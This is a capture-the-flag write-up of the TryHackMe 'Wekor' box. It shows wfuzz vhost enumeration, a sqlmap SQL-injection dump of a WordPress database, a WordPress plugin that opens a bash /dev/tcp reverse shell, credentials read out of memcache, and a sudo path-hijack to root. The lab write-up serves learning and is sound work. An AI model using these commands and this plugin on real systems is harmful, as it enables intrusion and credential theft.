CTF challenge involving Sqli , WordPress , vhost enumeration and recognizing internal services ;)

Medium rated but surely that description gives a lot away? This is Wekor from THM.


SSH and HTTP only.


Since we already know there is a VHOST/subdomain to find, I’ll run WFUZZ:

wfuzz -c -f sub-fighter -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -u "http://wekor.thm" -H "Host: FUZZ.wekor.thm" -t 42 --hh 23

This turns up site. I add site.wekor.thm to /etc/hosts along with wekor.thm.

On the main wekor.thm robots.txt is mostly trolling apart from /comingreallysoon which directs us to /it-next. This is a page with lots of stuff on it; the SQLi is on /it-next/it_cart.php with the parameters coupon_code=asdsadsadasd&apply_coupon=Apply+Coupon. I use sqlmap and enumerate the databases; we have wordpress so I dump the contents with:

sqlmap -r request -level=1 -risk=1 --batch -D wordpress --dump

With this we get some user:password combinations, with a little help from John.

Wordpress is at site.wekor.thm/wordpress and using the credentials we gained from the SQLi we can login. One of our users is a WP admin, and I upload a plugin zipfile for a reverse shell.

└─# cat plugin_shell.php 
root@kali:/opt/vulnhub/midnight# cat ../kbvuln/rev-plugin.php 

* Plugin Name: Reverse Shell Plugin  
* Plugin URI:  
* Description: Reverse Shell Plugin  
* Version: 1.0  
* Author: 
* Author URI: http://blog.gibbons.digital

exec("/bin/bash -c 'bash -i >& /dev/tcp/ 0>&1'");
└─# zip shell.zip plugin_shell.php
  adding: plugin_shell.php (deflated 31%)

On the box

We’re told to look for internal services and Linpeas finds memcache running on port 11211. I use telnet:

Connected to localhost.
Escape character is '^]'.
stats items
stats items
STAT items:1:number 5
STAT items:1:age 2096
STAT items:1:evicted 0
STAT items:1:evicted_nonzero 0
STAT items:1:evicted_time 0
STAT items:1:outofmemory 0
STAT items:1:tailrepairs 0
STAT items:1:reclaimed 0
STAT items:1:expired_unfetched 0
STAT items:1:evicted_unfetched 0
STAT items:1:crawler_reclaimed 0
STAT items:1:crawler_items_checked 0
STAT items:1:lrutail_reflocked 0
stats cachedump 1 100
stats cachedump 1 100
ITEM id [4 b; 1615202210 s]
ITEM email [14 b; 1615202210 s]
ITEM salary [8 b; 1615202210 s]
ITEM password [15 b; 1615202210 s]
ITEM username [4 b; 1615202210 s]
get KEY password
get KEY password
VALUE password 0 15

Now I can su Orka.


└─# nc -nvlp 1234                                                                                                           1 ⨯
listening on [any] 1234 ...
connect to [] from (UNKNOWN) [] 36006
bash: cannot set terminal process group (1072): Inappropriate ioctl for device
bash: no job control in this shell
www-data@osboxes:/var/www/html/site.wekor.thm/wordpress/wp-admin$ python -c 'import pty;pty.spawn("/bin/bash");'
<ss/wp-admin$ python -c 'import pty;pty.spawn("/bin/bash");'                 
www-data@osboxes:/var/www/html/site.wekor.thm/wordpress/wp-admin$ su Orka
su Orka
Password: REDACTED


# What can we do?

Orka@osboxes:~$ sudo -l
sudo -l
[sudo] password for Orka: REDACTED AGAIN LOL

Matching Defaults entries for Orka on osboxes:
    env_reset, mail_badpass,

User Orka may run the following commands on osboxes:
    (root) /home/Orka/Desktop/bitcoin

# Okay

Orka@osboxes:~$ mv Desktop Whatever
mv Desktop Whatever
Orka@osboxes:~$ ls
Documents  Music     Public  Templates  Videos
Downloads  Pictures  user.txt   Whatever
Orka@osboxes:~$ mkdir Desktop
mkdir Desktop
Orka@osboxes:~$ cd De
cd Desktop/
Orka@osboxes:~/Desktop$ ls
Orka@osboxes:~/Desktop$ printf 'sh\n' > bitcoin
printf 'sh\n' > bitcoin
Orka@osboxes:~/Desktop$ chmod +x bitcoin
chmod +x bitcoin
Orka@osboxes:~/Desktop$ sudo -u root /home/Orka/Desktop/bitcoin
sudo -u root /home/Orka/Desktop/bitcoin
# cd /root
cd /root
# id;hostname
uid=0(root) gid=0(root) groups=0(root)

A quick explanation. bitcoin was a binary that called a python script called transfer.py. Neither were writeable, both were owned by root. I couldn’t delete or rename either of them. Initially I tried messing with the things they were calling like the python modules being imported, but that wasn’t working. So I just renamed the entire Desktop directory, made another one and created my own bitcoin file. Face-palmingly simple in the end.